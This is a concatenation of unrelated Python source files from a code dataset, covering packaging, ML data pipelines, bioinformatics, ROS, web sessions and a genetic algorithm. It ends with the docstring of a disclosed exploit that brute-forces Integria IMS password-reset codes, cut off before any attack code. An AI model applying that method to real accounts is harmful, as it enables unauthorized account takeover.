from setuptools import setup, find_packages
from os import path
p = path.abspath(path.dirname(__file__))
with open(path.join(p, 'README.rst')) as f:
README = f.read()
setup(
name='paywix',
version='1.4.0',
author="<NAME>",
author_email="<EMAIL>",
description='Paywix is a light weight payment processing sdk for python based applications.',
long_description=README,
    long_description_content_type='text/x-rst',
install_requires=[
'requests'
],
url='https://github.com/renjithsraj/paywix',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
download_url='',
packages=find_packages(),
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
keywords='payment processing, payu, python payment gateway wrapper, cashfree, paytm, etc',
)
| StarcoderdataPython |
129983 | <gh_stars>0
import psycopg2
import tensorflow as tf
import logging
from src.config import predict_categories, label_name, feature_names
class Db2Tfrecord:
def query_db(self):
raise NotImplementedError
def format_data(self):
raise NotImplementedError
def write2tfrecord(self):
raise NotImplementedError
class PostgreSQL2Tfrecord(Db2Tfrecord):
"""Query data from PostgreSQL and write to tfrecord file."""
def query_db(self):
"""Query data from PostgreSQL"""
try:
conn = psycopg2.connect(
database="database",
user="user",
password="password",
host="localhost",
port="5432")
cur = conn.cursor()
cur.execute("select * from IRIS")
rows = cur.fetchall()
data = {}
data["sepal_length"] = []
data["sepal_width"] = []
data["petal_length"] = []
data["petal_width"] = []
data["variety"] = []
for row in rows:
data["sepal_length"].append(row[1])
data["sepal_width"].append(row[2])
data["petal_length"].append(row[3])
data["petal_width"].append(row[4])
data["variety"].append(row[5])
conn.commit()
conn.close()
except Exception as e:
logging.error("Can not query from db: {}".format(e))
return 0
return data
def format_data(self, data):
"""Format the query data from the PostgreSQL"""
data[label_name] = list(
map(lambda x: predict_categories.index(x), data["variety"]))
data[label_name] = tf.keras.utils.to_categorical(data[label_name])
return data
def write2tfrecord(self, data, filename):
"""Write the formated data into tfrecord file."""
with tf.io.TFRecordWriter(filename) as writer:
for i in range(len(data[list(data.keys())[0]])):
feature = {
"sepal_length": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["sepal_length"][i]])),
"sepal_width": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["sepal_width"][i]])),
"petal_length": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["petal_length"][i]])),
"petal_width": tf.train.Feature(
float_list=tf.train.FloatList(
value=[data["petal_width"][i]])),
"variety": tf.train.Feature(
float_list=tf.train.FloatList(
value=data["variety"][i]))
}
example_proto = tf.train.Example(
features=tf.train.Features(feature=feature))
example = example_proto.SerializeToString()
writer.write(example)
class Pipeline:
"""Load the data from tfrecords.
Attributes:
tfrecords_filenames: tfrecord file names in list
"""
def __init__(self, tfrecords_filenames):
"""Init Pipeline with tfrecords_filenames"""
self.features = {
"sepal_length": tf.io.FixedLenFeature([], tf.float32),
"sepal_width": tf.io.FixedLenFeature([], tf.float32),
"petal_length": tf.io.FixedLenFeature([], tf.float32),
"petal_width": tf.io.FixedLenFeature([], tf.float32),
"variety": tf.io.FixedLenFeature((3), tf.float32)
}
full_dataset = tf.data.TFRecordDataset(tfrecords_filenames)
data_size = 0
for _ in full_dataset:
data_size += 1
self.data_size = data_size
train_size = int(0.7 * data_size)
test_size = int(0.15 * data_size)
self.train_size = train_size
full_dataset = full_dataset.shuffle(buffer_size=1)
full_dataset = full_dataset.map(self.parse_data)
self.train_dataset = full_dataset.take(train_size)
self.test_dataset = full_dataset.skip(train_size)
self.val_dataset = self.test_dataset.skip(test_size)
self.test_dataset = self.test_dataset.take(test_size)
def parse_data(self, serialized):
"""Format tfrecord data.
Args:
serialized: The record in the tfrecord.
Returns:
Formated record.
"""
parsed_example = tf.io.parse_example(serialized, self.features)
inputs = {}
for key in parsed_example.keys():
if key in feature_names:
inputs[key] = parsed_example[key]
return (inputs, {label_name: parsed_example[label_name]})
def get_train_data(self, batch_size):
return self.train_dataset.batch(batch_size)
def get_val_data(self, batch_size):
return self.val_dataset.batch(batch_size)
def get_test_data(self, batch_size):
return self.test_dataset.batch(batch_size)
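# Usage sketch (assumes the hard-coded PostgreSQL instance above is reachable and
# that the "iris.tfrecord" path is writable; the file name is illustrative):
#
#   converter = PostgreSQL2Tfrecord()
#   data = converter.format_data(converter.query_db())
#   converter.write2tfrecord(data, "iris.tfrecord")
#   pipeline = Pipeline(["iris.tfrecord"])
#   train_ds = pipeline.get_train_data(batch_size=32)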
| StarcoderdataPython |
3338010 | <reponame>vinwerill/vinwerill-22
# Fetch the list of Kinmen tourist spots (open data)
import sys
import urllib.request
import json
import csv
def fetch(query_limit):
    # cap the number of records returned
    url = 'https://ws.kinmen.gov.tw/001/Upload/0/relfile/0/0/92b4584c-f454-4bd5-a75f-818dcf901f32.json'
    req = urllib.request.urlopen(url)
    # confirm the response encoding (utf-8)
    charset = req.info().get_content_charset()
    # print('response encoding:', charset)
    # response_data = req.read().decode(charset)
    response_data = req.read()
    # full data set
    json_data = json.loads(response_data)
    if query_limit == 0:
        return json_data
    return json_data[:query_limit]
if __name__ == '__main__':
    qlimit = int(input('Number of records to query (0 = all | -1 = quit): '))
if qlimit == -1:
sys.exit()
json_data = fetch(qlimit)
print(json.dumps(json_data, sort_keys=True, indent=4), file=open('kinmen_tourist_spot.json', 'wt'))
    print('Records (name: address):')
for col in json_data:
print(col['CName']+':'+col['CAdd'])
# encoding='utf8'
# newline=''
kinmen_tourist_spot_data = json_data
with open('kinmen_tourist_spot.csv', 'w', newline='', encoding='utf8') as kinmen_tourist_spot_csv:
        # write the records to the CSV file
csvwriter = csv.writer(kinmen_tourist_spot_csv)
count = 0
for row in kinmen_tourist_spot_data:
if count == 0:
header = row.keys()
csvwriter.writerow(header)
count += 1
csvwriter.writerow(row.values())
        print('\n' + 'Record count:', count)
| StarcoderdataPython |
1708059 | ##############################################################################
#
# Kennedy Institute of Rheumatology
#
# $Id$
#
# Copyright (C) 2015 <NAME>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
###############################################################################
"""
===========================
Pipeline cram2fastq
===========================
:Author: <NAME>
:Release: $Id$
:Date: |today|
:Tags: Python
Overview
========
This pipeline converts Sanger CRAM files to fastq.gz,
optionally quality trimming and reconciling the fastq files
Usage
=====
See :ref:`PipelineSettingUp` and :ref:`PipelineRunning` on general
information how to use CGAT pipelines.
Configuration
-------------
The pipeline requires a configured :file:`pipeline.yml` file.
CGATReport requires a :file:`conf.py` and optionally a
:file:`cgatreport.ini` file (see :ref:`PipelineReporting`).
Default configuration files can be generated by executing:
python <srcdir>/pipeline_cram2fastq.py config
Input files
-----------
Requirements
------------
On top of the default CGAT setup, the pipeline requires the following
software to be in the path:
* samtools >= 1.1
Pipeline output
===============
Glossary
========
Code
====
"""
from ruffus import *
import sys
import os
import glob
import sqlite3
from CGATCore import Experiment as E
from CGATCore import Pipeline as P
from CGATCore import Database as DB
import pysam
# -------------------------- < parse parameters > --------------------------- #
# load options from the config file
PARAMS = P.get_parameters(
["%s/pipeline.yml" % os.path.splitext(__file__)[0],
"../pipeline.yml",
"pipeline.yml"])
# ----------------------- < pipeline configuration > ------------------------ #
if len(sys.argv) > 1:
if(sys.argv[1] == "config") and __name__ == "__main__":
sys.exit(P.main(sys.argv))
# ------------------------< specific pipeline tasks >------------------------ #
@follows(mkdir("validate.cram.dir"))
@transform(glob.glob("data.dir/*.cram"),
regex(r".*/(.*).cram"),
[r"validate.cram.dir/\1.validate", r"validate.cram.dir/\1.quality"])
def validateCramFiles(infile, outfiles):
'''Validate CRAM files by exit status of
cramtools qstat. Save the quality scores of cram files.
'''
outfile, outfile_quality = outfiles
statement = '''temp_quality=`mktemp -p %(cluster_tmpdir)s`;
cramtools qstat -I %(infile)s > $temp_quality;
echo $? > %(outfile)s;
cat $temp_quality
| awk '{OFS="\\t"} {print $1,$2}'
> %(outfile_quality)s;
rm $temp_quality;
'''
P.run(statement)
@follows(validateCramFiles)
@merge(validateCramFiles,
"validate.cram.dir/summary.txt")
def inspectValidations(infiles, outfile):
'''Check that all crams pass validation or
raise an Error.'''
validation_files = [fn
for filenames in infiles
for fn in filenames
if fn.endswith(".validate")]
outfile_handle = open(outfile, "w")
exit_states = []
for validation_file in validation_files:
with open(validation_file, "r") as vf_handle:
exit_status = vf_handle.read().strip("\n")
exit_states.append(int(exit_status))
outfile_handle.write("\t".join([validation_file, exit_status])+"\n")
outfile_handle.close()
if sum(exit_states) != 0:
raise ValueError("One or more cram files failed validation")
@follows(validateCramFiles)
@merge(validateCramFiles,
"validate.cram.dir/cram_quality.load")
def loadCramQuality(infiles, outfile):
''' Load the quality scores for the different cells
into the database (summarized table).
'''
quality_files = [fn
for filenames in infiles
for fn in filenames
if fn.endswith(".quality")]
P.concatenate_and_load(quality_files, outfile,
regex_filename="validate.cram.dir/(.*).quality",
cat="track",
has_titles=False,
header="cramID,number_reads,cram_quality_score")
@follows(inspectValidations,
mkdir("cell.info.dir"))
@merge(glob.glob("data.dir/*.cram"),
"cell.info.dir/cells.txt")
def extractSampleInformation(infiles, outfile):
'''Make a table of cells and corresponding cram files'''
# build a dictionary of cell to cram file mappings
cells = {}
for cram_file in infiles:
cram = pysam.AlignmentFile(cram_file, "rc")
print(cram.header)
cell = cram.header["RG"][0]["SM"]
if cell not in cells.keys():
cells[cell] = [cram_file]
else:
cells[cell].append(cram_file)
cram.close()
# write out a per-cell list of cram files
outdir = os.path.dirname(outfile)
outfile_handle = open(outfile, "w")
outfile_handle.write("#cell\tcram_files\n")
for cell in cells.keys():
outfile_handle.write("\t".join([cell, ",".join(cells[cell])])+"\n")
outfile_handle.close()
@split(extractSampleInformation,
"cell.info.dir/*.cell")
def cellCramLists(infile, outfiles):
'''Make a per-cell file containing the cram file(s)
corresponding to the cell'''
out_dir = os.path.dirname(infile)
with open(infile, "r") as cell_list:
for record in cell_list:
if record.startswith("#"):
continue
cell, cram_list = record.strip("\n").split("\t")
crams = cram_list.split(",")
cell_outfile_name = os.path.join(out_dir, cell+".cell")
with open(cell_outfile_name, "w") as cell_file_handle:
for cram in crams:
cell_file_handle.write(cram+"\n")
@follows(mkdir("fastq.dir"),
mkdir("fastq.temp.dir"),
extractSampleInformation)
@transform(cellCramLists,
regex(r".*/(.*).cell"),
(r"fastq.dir/\1.fastq.1.gz",
r"fastq.dir/\1.fastq.2.gz"))
def cram2fastq(infile, outfiles):
'''Convert Sanger CRAM files to Fastq format
Takes care of merging, quality trimming
and pair reconciliation.
Intermediate files are not kept by default.'''
# TODO: make quality trimming optional.
###################################
# set variables and open a log file
###################################
cell_name = os.path.basename(infile)[:-len(".cell")]
out_dir = os.path.dirname(outfiles[0])
temp_dir = "fastq.temp.dir"
log_file = os.path.join(temp_dir,
cell_name + ".fastq.extraction.log")
log = open(log_file, "w")
log.write("Fastq extraction log file for %(infile)s\n\n")
def _merge_dicts(a, b):
x = a.copy()
x.update(b)
return(x)
temp_files = []
# ##############################################
# Extract per-end Fastq(s) from the cram file(s)
# ##############################################
raw_fastq_names = []
with open(infile, "rb") as cram_files:
for line in cram_files:
cram = line.strip()
cram_basename = os.path.basename(cram)[:-len(".cram")]
raw_fastq_name = os.path.join(temp_dir, cram_basename)
raw_fastq_names.append(raw_fastq_name)
job_memory = PARAMS["preprocess_memory"]
statement = '''cramtools fastq
--enumerate
--reverse
-F %(raw_fastq_name)s
-I %(cram)s
--gzip
'''
log.write("Extracting fastqs from %(cram)s:" % locals() + "\n")
log.write(statement % locals() + "\n")
P.run(statement)
log.write("done.\n\n")
# ####################################
# Perform quality trimming
# Merging is also taken care of here.
# ####################################
quality = PARAMS["preprocess_quality_threshold"]
minlen = PARAMS["preprocess_min_length"]
trim = PARAMS["preprocess_trim"]
trimmed_fastq_prefix = os.path.join(temp_dir, cell_name)
trimmed_fastq_files = []
# fastq(s) for each end are quality trimmed separately
for end in ["_1", "_2"]:
raw_fastqs = [x + end + ".fastq.gz" for x in raw_fastq_names]
temp_files += raw_fastqs
fastq_list = " ".join(raw_fastqs)
trimmed_fastq_name = trimmed_fastq_prefix + end + ".trimmed.fastq.gz"
trimmed_fastq_files.append(trimmed_fastq_name)
log.write(">> Quality trimming %(fastq_list)s: " % locals() + "\n")
if trim:
statement = '''zcat %(fastq_list)s
| fastq_quality_trimmer
-Q33
-t %(quality)s
-l %(minlen)s
| gzip -c
> %(trimmed_fastq_name)s
'''
else:
statement = '''zcat %(fastq_list)s
| gzip -c
> %(trimmed_fastq_name)s
'''
log.write(statement % _merge_dicts(PARAMS, locals()) + "\n")
P.run(statement)
log.write("done. \n\n")
# ##################
# Reconcile the ends
# ##################
if PARAMS["preprocess_reconcile"] != "False":
temp_files += trimmed_fastq_files
end1, end2 = trimmed_fastq_files
reconciled_fastq_prefix = outfiles[0][:-len(".1.gz")]
log.write(">> Reconciling pairs, %(end1)s & %(end2)s: "
% locals() + "\n")
statement = '''python %(scriptsdir)s/fastqs2fastqs.py
%(end1)s %(end2)s
--method reconcile
--chop
--unpaired
-o "%(reconciled_fastq_prefix)s.%%s.gz";
'''
log.write(statement % _merge_dicts(PARAMS, locals()) + "\n")
P.run(statement)
log.write("done\n\n")
else:
trimmed_fastq_prefix = outfiles[0][:-len(".1.gz")]
for end in trimmed_fastq_files:
if "1.trimmed" in end:
endn = "1"
else:
endn = "2"
trimmed_end_name = ".".join([trimmed_fastq_prefix, endn, "gz"])
os.symlink(os.path.abspath(end), trimmed_end_name)
##############################
# Clean up the temporary files
##############################
if PARAMS["keep_temporary"] == 0:
temp_file_list = " ".join(temp_files)
# record files sizes and md5 checksums of the temporary files
log.write(">> Recording sizes and checksums of temporary files:\n")
statement = '''ls -l %(temp_file_list)s
> %(temp_dir)s/%(cell_name)s.ls;
checkpoint;
md5sum %(temp_file_list)s
> %(temp_dir)s/%(cell_name)s.md5;
'''
log.write(statement % locals() + "\n")
P.run(statement)
log.write("done\n\n")
# unlink (delete) the temporary files
log.write(">> unlinking temporary files: " + temp_file_list + "\n")
for temp_file in temp_files:
os.unlink(temp_file)
log.write("tempororay files unlinked\n")
log.close()
# ---------------------< generic pipeline tasks >---------------------------- #
@follows(cram2fastq, loadCramQuality)
def full():
pass
# ########################################################################### #
if __name__ == "__main__":
sys.exit(P.main(sys.argv))
| StarcoderdataPython |
94712 | # Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from ros2interface.api import type_completer
from ros2interface.verb import VerbExtension
from rosidl_runtime_py import get_interface_path
class ReadStdinPipe(argparse.Action):
"""Get argument from stdin pipe."""
def __call__(self, parser, namespace, values, option_string=None):
if values == '-':
if sys.stdin.isatty():
parser.error('expected stdin pipe')
values = sys.stdin.readline().strip()
if not values:
parser.error('the passed value is empty')
setattr(namespace, self.dest, values)
class ShowVerb(VerbExtension):
"""Output the interface definition."""
def add_arguments(self, parser, cli_name):
arg = parser.add_argument(
'type',
action=ReadStdinPipe,
help="Show an interface definition (e.g. 'example_interfaces/msg/String'). "
"Passing '-' reads the argument from stdin (e.g. "
"'ros2 topic type /chatter | ros2 interface show -').")
arg.completer = type_completer
def main(self, *, args):
try:
file_path = get_interface_path(args.type)
except LookupError as e:
return str(e)
with open(file_path, 'r', encoding='utf-8') as h:
print(h.read().rstrip())
| StarcoderdataPython |
78125 | # -*- coding: utf-8 -*-
import furl
import urllib
import urlparse
import bson.objectid
import httplib as http
from datetime import datetime
import itsdangerous
from flask import request
from werkzeug.local import LocalProxy
from weakref import WeakKeyDictionary
from framework.flask import redirect
from framework.mongo import database
from website import settings
from .model import Session
def add_key_to_url(url, scheme, key):
"""Redirects the user to the requests URL with the given key appended
to the query parameters.
"""
query = request.args.to_dict()
query['view_only'] = key
replacements = {'query': urllib.urlencode(query)}
if scheme:
replacements['scheme'] = scheme
parsed_url = urlparse.urlparse(url)
if parsed_url.fragment:
        # Fragments only exist client side, so a fragment here means someone put a '#' in the URL.
        # WSGI auto-unescapes it, so we shove it back into the path as an escaped hash.
replacements['path'] = '{}%23{}'.format(parsed_url.path, parsed_url.fragment)
replacements['fragment'] = ''
parsed_redirect_url = parsed_url._replace(**replacements)
return urlparse.urlunparse(parsed_redirect_url)
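# Example behaviour (values are illustrative): for a request to
#   http://localhost:5000/project/?page=2
# with key 'abc123' and scheme 'https', this returns
#   https://localhost:5000/project/?page=2&view_only=abc123
# i.e. the current request's query string plus the view_only key, with the scheme swapped in.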
def prepare_private_key():
"""`before_request` handler that checks the Referer header to see if the user
is requesting from a view-only link. If so, reappend the view-only key.
NOTE: In order to ensure the execution order of the before_request callbacks,
this is attached in website.app.init_app rather than using
@app.before_request.
"""
# Done if not GET request
if request.method != 'GET':
return
# Done if private_key in args
key_from_args = request.args.get('view_only', '')
if key_from_args:
return
    # grab the view-only key from the referring request for non-logged-in users
if request.referrer:
referrer_parsed = urlparse.urlparse(request.referrer)
scheme = referrer_parsed.scheme
key = urlparse.parse_qs(
urlparse.urlparse(request.referrer).query
).get('view_only')
if key:
key = key[0]
else:
scheme = None
key = None
# Update URL and redirect
if key and not session.is_authenticated:
new_url = add_key_to_url(request.url, scheme, key)
return redirect(new_url, code=http.TEMPORARY_REDIRECT)
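# Minimal wiring sketch (illustrative only; the real registration happens in
# website.app.init_app, as noted in the docstring above):
#   app.before_request(prepare_private_key)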
def get_session():
session = sessions.get(request._get_current_object())
if not session:
session = Session()
set_session(session)
return session
def set_session(session):
sessions[request._get_current_object()] = session
def create_session(response, data=None):
current_session = get_session()
if current_session:
current_session.data.update(data or {})
current_session.save()
cookie_value = itsdangerous.Signer(settings.SECRET_KEY).sign(current_session._id)
else:
session_id = str(bson.objectid.ObjectId())
session = Session(_id=session_id, data=data or {})
session.save()
cookie_value = itsdangerous.Signer(settings.SECRET_KEY).sign(session_id)
set_session(session)
if response is not None:
response.set_cookie(settings.COOKIE_NAME, value=cookie_value, domain=settings.OSF_COOKIE_DOMAIN)
return response
sessions = WeakKeyDictionary()
session = LocalProxy(get_session)
# Request callbacks
# NOTE: This gets attached in website.app.init_app to ensure correct callback
# order
def before_request():
from framework.auth import cas
# Central Authentication Server Ticket Validation and Authentication
ticket = request.args.get('ticket')
if ticket:
service_url = furl.furl(request.url)
service_url.args.pop('ticket')
        # Attempt auth with CAS, and return a proper redirect response
resp = cas.make_response_from_ticket(ticket=ticket, service_url=service_url.url)
if request.cookies.get(settings.COOKIE_NAME):
# TODO: Delete legacy cookie, this special case can be removed anytime after 1/1/2016.
# A cookie is received which could potentially be a legacy (pre multi-domain) cookie.
# Issuing a targeted delete of the legacy cookie ensures the user does not end up in a
            # login loop whereby both cookies are sent to the server and one of them
            # is read at random for authentication.
resp.delete_cookie(settings.COOKIE_NAME, domain=None)
return resp
if request.authorization:
# TODO: Fix circular import
from framework.auth.core import get_user
user = get_user(
email=request.authorization.username,
password=request.authorization.password
)
# Create empty session
        # TODO: Shouldn't need to create a session for Basic Auth
session = Session()
set_session(session)
if user:
user_addon = user.get_addon('twofactor')
if user_addon and user_addon.is_confirmed:
otp = request.headers.get('X-OSF-OTP')
if otp is None or not user_addon.verify_code(otp):
                    # OTP header missing or the supplied two-factor code failed verification
session.data['auth_error_code'] = http.UNAUTHORIZED
return
session.data['auth_user_username'] = user.username
session.data['auth_user_id'] = user._primary_key
session.data['auth_user_fullname'] = user.fullname
else:
            # Invalid credentials: user not found or wrong password
session.data['auth_error_code'] = http.UNAUTHORIZED
return
cookie = request.cookies.get(settings.COOKIE_NAME)
if cookie:
try:
session_id = itsdangerous.Signer(settings.SECRET_KEY).unsign(cookie)
session = Session.load(session_id) or Session(_id=session_id)
except itsdangerous.BadData:
return
if session.data.get('auth_user_id') and 'api' not in request.url:
database['user'].update({'_id': session.data.get('auth_user_id')}, {'$set': {'date_last_login': datetime.utcnow()}}, w=0)
set_session(session)
def after_request(response):
if session.data.get('auth_user_id'):
session.save()
return response
| StarcoderdataPython |
3274402 | <gh_stars>0
import codecs
import numpy as np
import random
from copy import deepcopy
categories = ['science', 'style', 'culture', 'life', 'economics', 'business', 'travel', 'forces', 'media', 'sport']
dict_file = codecs.open('processed/dictionary.txt', 'r', 'utf_8_sig')
dictionary = []
for line in dict_file:
line = line[: len(line) - 1]
dictionary.append(line)
dl = len(dictionary)
neuron_number = 1
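# Single-hidden-layer network: weights[0] maps the bag-of-words input (one entry per
# dictionary word) onto `neuron_number` hidden units, and weights[1] maps the hidden
# units onto the 10 category outputs; see propogation() and classify() below.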
weights = [[[0 for i in range(neuron_number)] for j in range(dl)], [[0 for i in range(10)] for j in range(neuron_number)]]
train_vectors_i = codecs.open('processed/train_vectors_input.txt', 'r', 'utf_8_sig')
train_vectors_o = codecs.open('processed/train_vectors_outputs.txt', 'r', 'utf_8_sig')
input_vectors = []
outputs = []
for line in train_vectors_i:
line2 = line[1:-2]
input_vector = line2.split(', ')
input_vectors.extend([[int(i) for i in input_vector]])
for line in train_vectors_o:
line2 = line[1:-2]
output_vector = line2.split(', ')
outputs.extend([[int(i) for i in output_vector]])
print('read')
'''
dl = 2
neuron_number = 3
'''
def ReLU(x, coef = 1):
if x >=0:
return x * coef
else:
return 0
def classify(output_vector):
return categories[output_vector.index(max(output_vector))]
def propogation(input_vector, weights, dictionary_length = dl, neuron_number = neuron_number, activation_function = ReLU):
hidden_layer = [0] * neuron_number
for i in range(neuron_number):
neuron = 0
for j in range(dictionary_length):
neuron += input_vector[j] * weights[0][j][i]
neuron = activation_function(neuron)
hidden_layer[i] = neuron
output_vector = [0] * 10
for i in range(10):
output = 0
for j in range(neuron_number):
output += hidden_layer[j] * weights[1][j][i]
output = activation_function(output)
output_vector[i] = output
return output_vector
def calculate_indices(list_, d = 0.05):
    # sample (with replacement) a random set of indices covering a fraction d of the list
    indices = []
    for i in range(int(len(list_) * d)):
        index = random.randint(0, len(list_) - 1)
        indices.extend([index])
    return indices
def calculate_accuracy(inputs, outputs, weights, indices, dictionary_length = dl, neuron_number = neuron_number, activation_function = ReLU):
TN_TP = 0
TN_TP_FP_FN = 0
for i in indices:
TN_TP_FP_FN += 1
if classify(propogation(inputs[i], weights)) == classify(outputs[i]):
TN_TP += 1
return TN_TP/TN_TP_FP_FN
def crossed(weights1, weights2):
    # uniform crossover: the child takes each weight from one parent or the other based on index parity
    w1 = deepcopy(weights1)
    w2 = deepcopy(weights2)
    w3 = deepcopy(weights1)
    for i in range(len(weights1)):
        for j in range(len(weights1[i])):
            for k in range(len(weights1[i][j])):
                if int((i+j+k)%2) == 1:
                    w3[i][j][k] = w1[i][j][k]
                else:
                    w3[i][j][k] = w2[i][j][k]
    return w3
def mutate(weights, percentage = .4, rate = 2, probabilty = .1):
    # with probability `probabilty` the weights are returned unchanged (no mutation applied)
    p = random.randint(0, 100) / 100
    if p < probabilty:
        return weights
    # flatten the nested weight matrices into a single list
    weights_unpacked = []
    for i in range(len(weights)):
        for j in range(len(weights[i])):
            for k in range(len(weights[i][j])):
                weights_unpacked.append(weights[i][j][k])
    # perturb a `percentage` fraction of randomly chosen weights by up to +/- `rate`
    for i in range(int(len(weights_unpacked) * percentage)):
        index = random.randrange(0, len(weights_unpacked))
        weights_unpacked[index] += random.randrange(int(-rate * 100), int(rate * 100)) / 100
    # repack the flattened list into the original nested structure using a running index
    idx = 0
    for i in range(len(weights)):
        for j in range(len(weights[i])):
            for k in range(len(weights[i][j])):
                weights[i][j][k] = weights_unpacked[idx]
                idx += 1
    return weights
def train(input_vectors, outputs, population_count = 10, epochs = 1):
global dl
global neuron_number
random_range = 2
#generating
population = [[] for i in range(population_count)]
for i in range(population_count):
population[i] = [[[0 for i in range(neuron_number)] for j in range(dl)], [[0 for i in range(10)] for j in range(neuron_number)]]
for j in range(len(population[i])):
for k in range(len(population[i][j])):
for l in range(len(population[i][j][k])):
population[i][j][k][l] = random.randrange(-random_range * 100, random_range * 100) / 100
for e in range(epochs):
#crossing
new_population = []
for i in range(population_count):
for j in range(i+1, population_count):
new_population.extend([crossed(population[i], population[j])])
#mutating
for w in new_population:
w = mutate(w)
#selecting
survived = []
measured = []
for j in new_population:
indices = calculate_indices(outputs)
measured.extend([calculate_accuracy(input_vectors, outputs, j, indices)])
print('N: {}/{}, ACC: {}, last: {}'.format(new_population.index(j), len(new_population), "%.3f" % max(measured),"%.3f" % measured[-1]))
for i in range(population_count):
survived.extend([new_population[measured.index(max(measured))]])
new_population.remove(new_population[measured.index(max(measured))])
measured.remove(max(measured))
res_for_this_epoch = calculate_accuracy(input_vectors, outputs, survived[0], range(len(outputs)))
population = survived[:]
print('epoch {} finished with accuracy {}'.format(e, res_for_this_epoch))
#train([[[0,0,0],[0,0,0]], [[0],[0],[0]]], [[1, 2],[1, 3],[2, 2],[2, 3],[3, 3]], [3, 4, 4, 5, 6], epochs = 5)
train(input_vectors, outputs, epochs=1000) | StarcoderdataPython |
1717293 | #!/usr/bin/env python3
import fileinput
import datetime
import os
today = datetime.date.today()
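# birthdays.txt format (inferred from the parsing below): the first line is a header and is
# skipped; every following line is "<month> <day> <name, possibly containing spaces>"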
with open("/root/birthdays.txt") as file:
next(file)
raw = []
for line in file:
raw.append(tuple(line.split()))
names = [' '.join(i[2:]) for i in raw]
start = [(int(i[0]),int(i[1])) for i in raw]
end = start[:]
for t in range(len(end)):
    # the day after the birthday; datetime handles month/year boundaries correctly
    next_day = datetime.date(today.year, end[t][0], end[t][1]) + datetime.timedelta(days=1)
    end[t] = (next_day.month, next_day.day)
for d in range(len(start)):
if (today.month,today.day) == start[d]:
with fileinput.FileInput("/home/webby/doushio/imager/config.js", inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("IMAGE_HATS: false", "IMAGE_HATS: true"), end="")
with fileinput.FileInput("/home/webby/doushio/hot.js", inplace=True, backup='.bak') as file:
for line in file:
if "CUSTOM_BANNER_TOP:" in line:
print(' CUSTOM_BANNER_TOP: "Happy Birthday ' + names[d] + '!",', end="")
else:
print(line, end="")
if (today.month,today.day) == end[d]:
with fileinput.FileInput("/home/webby/doushio/imager/config.js", inplace=True, backup='.bak') as file:
for line in file:
print(line.replace("IMAGE_HATS: true", "IMAGE_HATS: false"), end="")
os.rename("/home/webby/doushio/hot.js.bak","/home/webby/doushio/hot.js") | StarcoderdataPython |
1762661 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from . import boundingBox
from . import imageGradients
from . import rawData
view_extensions = [
# Set show=True if extension should be shown by default
# in the 'Select Visualization Method' dialog. These defaults
# can be changed by editing DIGITS config option
# 'view_extension_list'
{'class': boundingBox.Visualization, 'show': True},
{'class': imageGradients.Visualization, 'show': False},
{'class': rawData.Visualization, 'show': True},
]
def get_default_extension():
"""
return the default view extension
"""
return rawData.Visualization
def get_extensions(show_all=False):
"""
return set of data data extensions
"""
return [extension['class']
for extension in view_extensions
if show_all or extension['show']]
def get_extension(extension_id):
"""
return extension associated with specified extension_id
"""
for extension in view_extensions:
extension_class = extension['class']
if extension_class.get_id() == extension_id:
return extension_class
return None
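# Usage sketch (the id string below is hypothetical; real ids are whatever each
# extension class returns from get_id()):
#   extension_class = get_extension('image-bounding-boxes')
#   if extension_class is None:
#       extension_class = get_default_extension()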
| StarcoderdataPython |
43519 | <filename>backend/unpp_api/apps/partner/migrations/0017_auto_20170920_0639.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-20 06:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('partner', '0016_auto_20170920_0340'),
]
operations = [
migrations.AlterField(
model_name='partnerprofile',
name='year_establishment',
field=models.PositiveSmallIntegerField(blank=True, help_text='Enter valid year.', null=True, verbose_name='Year of establishment'),
),
]
| StarcoderdataPython |
1700522 | '''
* Vendor: Artica Soluciones Tecnologicas
* Product: Integria IMS Server
* Version: 5.0 MR56 Package 58 and probably earlier
* Category: CWE-640 Weak Password Recovery Mechanism
* Reported: 3/14/17
* Patched: 6/20/17
* Disclosed: 5/14/18
* Researcher: <NAME>
* CVE: TBD
* Reference: https://cp270.wordpress.com/2018/05/14/war-story-password-resets/
* Reference: https://github.com/articaST/integriaims/commit/f2ff0ba821644acecb893483c86a9c4d3bb75047
!!!! DO NOT USE without proper authorization !!!!
The Integria IMS password recovery function generates and emails a verification code to users who forget their password. The function has two flaws:
- Insufficient randomness (for any given user there are only 100 possible codes)
- Lack of brute force protection
This script exploits these complementary flaws by initiating the password recovery process for a given user, then trying all 100 possible codes until it finds the correct one.
The verification code is an MD5 hash in the following format:
MD5(sitename + [random number between 0 and 100] + username)
The sitename is the <title> of the external-facing login HTML page and is automatically parsed by this script.
Thus, all that is needed to gain access to a user's account is their username.
'''
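# For illustration only (site name and username below are placeholders), a single candidate
# verification code is computed as:
#   hashlib.md5("SiteName" + "42" + "jdoe").hexdigest()
# The attack simply walks all 100 possible random values (0-99) for the real sitename/username.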
import requests, sys, hashlib
